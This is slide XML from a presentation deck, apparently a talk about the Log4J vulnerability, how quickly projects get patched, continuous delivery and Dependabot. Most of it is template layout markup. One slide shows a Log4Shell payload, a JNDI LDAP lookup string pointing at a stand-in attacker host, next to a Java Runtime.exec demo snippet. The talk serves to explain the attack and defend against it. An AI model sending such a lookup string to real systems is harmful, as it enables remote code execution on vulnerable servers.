          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964513" y="504100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9" name="Google Shape;539;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877193" y="999423"/>
            <a:ext cx="944700" cy="9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Our company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3210519" y="1442246"/>
            <a:ext cx="827400" cy="82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1560061" y="3497793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5568316" y="3003285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3" name="Google Shape;543;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419044" y="3429085"/>
            <a:ext cx="827400" cy="82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4757915" y="752334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5" name="Google Shape;545;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306337" y="1113912"/>
            <a:ext cx="441000" cy="44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551" name="Google Shape;551;p4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114</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="552" name="Google Shape;552;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="696850" y="1474725"/>
          <a:ext cx="7689050" cy="2986825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{232FB1C1-C29F-448D-9ACA-C14235081580}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="85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115</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248575" y="341363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means that you can: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Resize them without losing quality.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Change fill color and opacity.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Isn’t that nice? :)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Examples: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430365" y="301250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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005201" y="368256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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597608" y="369305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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223495" y="360279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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830763" y="357088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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3343380" y="352826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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3961313" y="331016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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4520195" y="357613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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130129" y="363994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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723585" y="355493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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434626" y="8947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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022225" y="8947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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599727" y="963307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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2186802" y="930329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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2777067" y="955330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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3371047" y="955330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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3968218" y="959045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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4537220" y="940425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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086529" y="900017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5685296" y="915970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>
            <a:off x="405363" y="1567384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995104" y="1511022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1598132" y="1529095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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2182016" y="1517403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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2782378" y="1529642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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386455" y="1486567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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3929930" y="1576432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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4535078" y="1518998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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121627" y="1504116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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691153" y="1515808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>
            <a:off x="454295" y="2121480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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027536" y="2122027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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622063" y="2122027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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204875" y="2122027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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872767" y="2067784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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3471556" y="2070975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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064465" y="2121480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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554768" y="2116694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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128009" y="2126266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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722514" y="20672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552684" y="2671336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1065825" y="2655383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1613539" y="2655383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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744613" y="2733556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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2165516" y="2683029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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3363070" y="2693147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3949074" y="2696338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4484572" y="2696338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5164702" y="2680384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5754968" y="2701124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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417077" y="3309463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1000415" y="3333918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1599727" y="3322226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2184660" y="3314249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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2793021" y="3288723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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348713" y="3333393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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937382" y="3333393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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4535624" y="3304677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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5103532" y="3264268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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721465" y="3288198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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411220" y="3860368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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980746" y="3924707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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670973" y="3833247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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221900" y="3875251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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785044" y="3906109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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370501" y="3877917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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3956527" y="3873131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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4515933" y="3876846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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121627" y="3869416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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718799" y="3851321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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383050" y="4515519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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010533" y="4444777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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583249" y="4421917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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192113" y="4458610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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2742493" y="4459681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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3380073" y="4427774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3894832" y="4422988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4488812" y="4416060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5098746" y="4527211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5744325" y="4481470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6350992" y="1906892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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7244612" y="1906882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6535708" y="2117745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7689847" y="2415142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648" name="Google Shape;648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655" name="Google Shape;655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9" name="Google Shape;659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660" name="Google Shape;660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3" name="Google Shape;663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664" name="Google Shape;664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9" name="Google Shape;669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670" name="Google Shape;670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674" name="Google Shape;674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8" name="Google Shape;678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679" name="Google Shape;679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4" name="Google Shape;684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685" name="Google Shape;685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691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692" name="Google Shape;692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4" name="Google Shape;694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695" name="Google Shape;695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8" name="Google Shape;698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699" name="Google Shape;699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705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06" name="Google Shape;706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12" name="Google Shape;712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5" name="Google Shape;715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16" name="Google Shape;716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17" name="Google Shape;717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7" name="Google Shape;727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3" name="Google Shape;733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34" name="Google Shape;734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39" name="Google Shape;739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45" name="Google Shape;745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1" name="Google Shape;751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752" name="Google Shape;752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757" name="Google Shape;757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762" name="Google Shape;762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7" name="Google Shape;767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768" name="Google Shape;768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8" name="Google Shape;778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779" name="Google Shape;779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2" name="Google Shape;782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783" name="Google Shape;783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3" name="Google Shape;793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794" name="Google Shape;794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8" name="Google Shape;798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799" name="Google Shape;799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9" name="Google Shape;809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10" name="Google Shape;810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18" name="Google Shape;818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23" name="Google Shape;823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28" name="Google Shape;828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3" name="Google Shape;833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34" name="Google Shape;834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0" name="Google Shape;840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41" name="Google Shape;841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45" name="Google Shape;845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0" name="Google Shape;850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851" name="Google Shape;851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7" name="Google Shape;857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858" name="Google Shape;858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1" name="Google Shape;861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862" name="Google Shape;862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6" name="Google Shape;866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867" name="Google Shape;867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874" name="Google Shape;874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1" name="Google Shape;881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882" name="Google Shape;882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887" name="Google Shape;887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0" name="Google Shape;890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891" name="Google Shape;891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895" name="Google Shape;895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00" name="Google Shape;900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05" name="Google Shape;905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0" name="Google Shape;910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11" name="Google Shape;911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18" name="Google Shape;918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26" name="Google Shape;926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" name="Google Shape;938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39" name="Google Shape;939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3" name="Google Shape;943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44" name="Google Shape;944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948" name="Google Shape;948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" name="Google Shape;954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955" name="Google Shape;955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3" name="Google Shape;963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964" name="Google Shape;964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977" name="Google Shape;977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9" name="Google Shape;989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990" name="Google Shape;990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2" name="Google Shape;1002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03" name="Google Shape;1003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10" name="Google Shape;1010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026" name="Google Shape;1026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1" name="Google Shape;1031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32" name="Google Shape;1032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33" name="Google Shape;1033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37" name="Google Shape;1037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41" name="Google Shape;1041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45" name="Google Shape;1045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8" name="Google Shape;1048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049" name="Google Shape;1049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7" name="Google Shape;1057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058" name="Google Shape;1058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2" name="Google Shape;1082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083" name="Google Shape;1083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084" name="Google Shape;1084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087" name="Google Shape;1087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9" name="Google Shape;1089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92" name="Google Shape;1092;p47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093" name="Google Shape;1093;p4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116</a:t>
            </a:fld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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="929700" y="990500"/>
            <a:ext cx="73275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 any emoji as an icon!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9" name="Google Shape;1099;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808100" y="246648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4"/>
                </a:highlight>
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway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4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0" name="Google Shape;1100;p4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117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07" name="Google Shape;1107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08" name="Google Shape;1108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09" name="Google Shape;1109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1" name="Google Shape;1111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12" name="Google Shape;1112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4" name="Google Shape;1114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15" name="Google Shape;1115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7" name="Google Shape;1117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18" name="Google Shape;1118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120" name="Google Shape;1120;p49">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="47379"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511950" y="1451225"/>
            <a:ext cx="1205625" cy="5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2019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$10,067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524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2020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$10,849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86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$44,039</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3274965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89144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November 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 2021</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0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$57,382</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213373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03800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4002360" y="279023"/>
            <a:ext cx="182880" cy="4608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5;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE032193-7E23-2A9C-8E89-EEE96C2E4E66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December 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 2021 </a:t>
            </a:r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$50,470</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;207;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC382457-4B72-F480-ADF5-F2EE1121AEA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210351" y="822053"/>
            <a:ext cx="1690084" cy="44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chemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (16 days later )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389510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-2.77778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621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BF87D-EBFC-439F-6EF7-162BD996F7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827398" y="1797139"/>
            <a:ext cx="56285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jndi:ldap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://hackor.now:1389/123}"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1" name="Google Shape;603;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62D9D7C7-25C7-C3E5-35B1-3AD41C25ED01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5480223" y="2403389"/>
            <a:ext cx="3194220" cy="202650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3237471" y="2336606"/>
            <a:ext cx="718598" cy="64755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AFA3B-19BA-657E-5D46-6C30B5972A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059195" y="2489886"/>
            <a:ext cx="1436714" cy="28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037161" y="2926682"/>
            <a:ext cx="10679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2B15F-1189-2C10-8C30-C10911796178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649201" y="4382864"/>
            <a:ext cx="10021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CE9178"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hackor.now</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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EF777-4E1E-41D8-DEAF-7B3314B09F89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4059195" y="2806609"/>
            <a:ext cx="1421028" cy="27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35CAC82-1887-468F-F5D0-9B55E38BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5936245" y="2839588"/>
            <a:ext cx="25343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Process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Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p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=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Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700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getRuntime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().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new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String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[]{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"open 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,    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"https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>youtu.be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/dQw4w9WgXcQ"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);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4241510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2752467" y="1409360"/>
            <a:ext cx="3639065" cy="327929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956069" y="4641545"/>
            <a:ext cx="1066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FE3C5-7F9C-D2FA-90A9-E41B8EB2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95" y="1753213"/>
            <a:ext cx="2931804" cy="189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37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49B535-86A5-2419-0D9E-1873A900224C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219456" y="1310640"/>
            <a:ext cx="8705088" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00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63;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4098A89-805F-1E6E-3258-41B3FA4030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393" y="1340335"/>
            <a:ext cx="7815199" cy="2347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latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>f a security vulnerability was discovered today,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latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0" err="1">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> an updated/patch version was released at the same time,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latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>ow long would it be until your projects were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dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>no longer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000" b="1" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="6000" b="1" dirty="0">
              <a:latin typeface="Raleway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0FE14-0952-2CB1-1A9D-051C5572A1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7985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233298" y="3789938"/>
            <a:ext cx="392142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sz="1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519A4F-2D81-E459-5812-189845B1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4726" y="193762"/>
            <a:ext cx="4755976" cy="4755976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;267;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75ED1271-44EF-8411-CF55-25A3B35AAD36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403964" y="19376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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="300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649565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3;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5F3977-1A15-19BA-4F96-F080CE200BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562233" y="1128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4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Thus begins…</a:t>
            </a:r>
            <a:endParaRPr sz="30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294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877330" y="1891681"/>
            <a:ext cx="7531443" cy="1092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        Tales of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DBCDCD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terror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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0"/>
              <a:t>featuring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800" b="1" dirty="0"/>
              <a:t> Log4J</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1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1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5D07CB-DC96-DA3A-2089-FEA66AE21EF5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Continuous Delivery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481105" y="4288804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2103718" y="3452097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312768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3420528" y="3452097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301153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94FF531-2A42-19BF-3CE7-C96A736A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18" y="1655483"/>
            <a:ext cx="5678256" cy="2508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3E6F1-C208-0FCE-B769-5A7D607C8CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076824" y="1251797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Dependabot.yml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813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AE947A-FF86-FF90-0F3C-BF9B7E99F2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3C8FF-CE45-5CC3-39B6-994AD7EE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52" y="407172"/>
            <a:ext cx="6204677" cy="4194711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Terminator 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82347E25-BCF7-7BED-CE06-9170252769F2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6" name="Process 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E694A695-8CCC-08E2-7AE1-EE48B4F2F982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A6AA0-0E90-5EF3-179D-61CB59F20E9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rocess 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
